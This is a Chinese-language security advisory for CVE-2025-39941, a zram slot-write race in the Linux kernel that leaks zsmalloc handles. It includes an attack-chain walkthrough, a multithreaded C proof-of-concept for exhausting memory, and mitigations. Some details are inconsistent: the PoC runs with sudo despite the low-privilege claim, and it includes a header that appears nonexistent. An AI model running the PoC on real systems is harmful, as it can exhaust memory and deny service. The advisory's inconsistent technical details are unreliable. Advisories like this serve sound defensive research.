CVE-2025-39941 Linux内核zram槽位写入竞争条件漏洞

漏洞信息

漏洞编号

CVE-2025-39941

漏洞类型

竞争条件漏洞（Race Condition）

CVSS评分

4.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 zram子系统

漏洞概述

CVE-2025-39941是Linux内核zram子系统中存在的一个竞争条件漏洞。该漏洞位于zram槽位写入路径中，当多个CPU并发地对同一个zram索引执行写入操作时，会导致zsmalloc句柄（handle）泄漏问题。zram是Linux内核中用于将内存页面压缩后存储在RAM中的块设备驱动，常用于嵌入式设备和内存受限的场景。zsmalloc则是内核中专门为zram设计的内存分配器，用于管理压缩后的小对象存储。

该漏洞的根本原因是zram_slot_lock锁的保护范围不足。在并发写入场景中，多个CPU可能在不同的时间点获取和释放zram_slot_lock，导致zs_free()调用过早发生。具体而言，当CPU0在释放旧句柄之后、设置新句柄之前，另一个CPU可能已经完成了压缩并设置了其自己的句柄，从而导致其中一个CPU的zsmalloc句柄永远不会被释放，形成内存泄漏。

该漏洞的CVSS评分为4.7，属于中危级别。虽然攻击向量为本地（AV:L），需要低权限（PR:L），但其对系统可用性影响为高（A:H），长期运行可能导致系统内存耗尽。攻击复杂度较高（AC:H），需要特定的并发时序条件才能触发。此漏洞影响所有使用zram功能的Linux系统，包括各类Linux发行版和嵌入式系统。

技术细节

该漏洞的核心技术原理在于zram槽位写入路径中锁的临界区设计不当。在正常情况下，zram写入流程应该遵循以下顺序：1）获取zram_slot_lock；2）释放旧的zsmalloc句柄（zs_free）；3）压缩新数据；4）分配新的zsmalloc句柄（zs_malloc）；5）设置新的句柄到zram条目（zram_set_handle）；6）释放zram_slot_lock。

然而，实际代码实现中，zs_free()被放置在zram_slot_lock()的保护范围之外，导致以下竞争场景：

CPU0首先获取zram_slot_lock并执行zs_free(handle)释放旧句柄，然后释放锁。CPU1此时获取zram_slot_lock，同样执行zs_free(handle)（释放同一个旧句柄，造成double-free风险或无效释放），然后释放锁。接下来两个CPU并发执行compress和zs_malloc操作，最终各自设置新的句柄。由于旧句柄已经被提前释放，最终只有一个CPU的新句柄被正确设置，另一个CPU的zs_malloc分配的句柄将永远丢失，造成内存泄漏。

正确的修复方案是将zram条目的重置操作（reset）与新句柄的设置操作（zram_set_handle）放在同一个zram_slot_lock锁的保护范围内执行，确保zs_free和zram_set_handle在同一个原子操作中完成，从而避免句柄泄漏。

利用方式方面，攻击者可以通过编写多线程程序，对同一个zram设备文件执行并发写入操作来触发该漏洞。需要创建大量并发线程，使用相同的偏移量写入不同的数据，从而在压缩和句柄分配阶段产生竞争条件。

攻击链分析

STEP 1

步骤1：环境准备

攻击者在本地系统上加载zram模块并创建zram设备（如/dev/zram0），确保目标系统已配置并启用zram功能。

STEP 2

步骤2：权限获取

由于该漏洞需要本地低权限访问（PR:L），攻击者只需拥有普通用户权限即可利用此漏洞，无需root权限。

STEP 3

步骤3：触发竞争条件

攻击者编写多线程程序，创建多个并发线程同时对同一个zram索引位置执行写入操作，利用时序差异触发竞争条件。

STEP 4

步骤4：内存泄漏累积

在竞争窗口中，多个CPU的zs_free()调用过早执行，导致部分zsmalloc句柄泄漏。随着时间推移，泄漏的句柄不断累积。

STEP 5

步骤5：系统资源耗尽

持续运行触发程序会导致zsmalloc分配的内存不断泄漏，最终可能耗尽系统内存，影响系统可用性（A:H），甚至导致系统不稳定或OOM。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2025-39941 - zram slot write race condition PoC
 * This PoC demonstrates the race condition in zram slot write path
 * that leads to zsmalloc handle leaks.
 * 
 * Compile: gcc -o poc_zram_race poc_zram_race.c -lpthread
 * Usage: sudo ./poc_zram_race /dev/zram0
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <linux/blkzram.h>

#define NUM_THREADS 8
#define NUM_ITERATIONS 10000
#define PAGE_SIZE 4096
#define TARGET_INDEX 0  /* All threads write to the same zram index */

static int zram_fd;
static volatile int start_flag = 0;

typedef struct {
    int thread_id;
    int iterations;
} thread_arg_t;

void *race_worker(void *arg) {
    thread_arg_t *targ = (thread_arg_t *)arg;
    char *page = aligned_alloc(PAGE_SIZE, PAGE_SIZE);
    if (!page) {
        perror("aligned_alloc");
        return NULL;
    }
    
    /* Wait for all threads to be ready */
    while (!start_flag) {
        sched_yield();
    }
    
    for (int i = 0; i < targ->iterations; i++) {
        /* Fill page with thread-specific data */
        memset(page, targ->thread_id, PAGE_SIZE);
        
        /* Write to the same zram index to trigger race condition */
        off_t offset = (off_t)TARGET_INDEX * PAGE_SIZE;
        if (pwrite(zram_fd, page, PAGE_SIZE, offset) < 0) {
            perror("pwrite");
            break;
        }
    }
    
    free(page);
    return NULL;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <zram_device>\n", argv[0]);
        return 1;
    }
    
    zram_fd = open(argv[1], O_RDWR);
    if (zram_fd < 0) {
        perror("open zram device");
        return 1;
    }
    
    pthread_t threads[NUM_THREADS];
    thread_arg_t args[NUM_THREADS];
    
    /* Create worker threads */
    for (int i = 0; i < NUM_THREADS; i++) {
        args[i].thread_id = i;
        args[i].iterations = NUM_ITERATIONS;
        if (pthread_create(&threads[i], NULL, race_worker, &args[i]) != 0) {
            perror("pthread_create");
            return 1;
        }
    }
    
    /* Start all threads simultaneously to maximize race condition chance */
    usleep(100000);
    start_flag = 1;
    
    /* Wait for all threads to complete */
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }
    
    printf("Race condition test completed. Check kernel logs for memory leaks.\n");
    printf("Monitor with: cat /sys/block/zram0/mm_stat\n");
    
    close(zram_fd);
    return 0;
}

影响范围

Linux kernel < 6.17 (所有使用zram子系统的版本)

Linux kernel stable分支 (需检查具体修复提交)

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制对zram设备的访问权限，仅允许可信用户使用；2）如果zram并非业务必需，可以临时卸载zram模块（rmmod zram）以避免漏洞被触发；3）监控系统内存使用情况，设置适当的内存使用告警阈值；4）使用cgroups限制单个用户或进程组对zram设备的使用量，防止内存泄漏导致系统完全不可用；5）部署内核监控工具（如SystemTap或BPF）检测异常的zsmalloc句柄分配模式。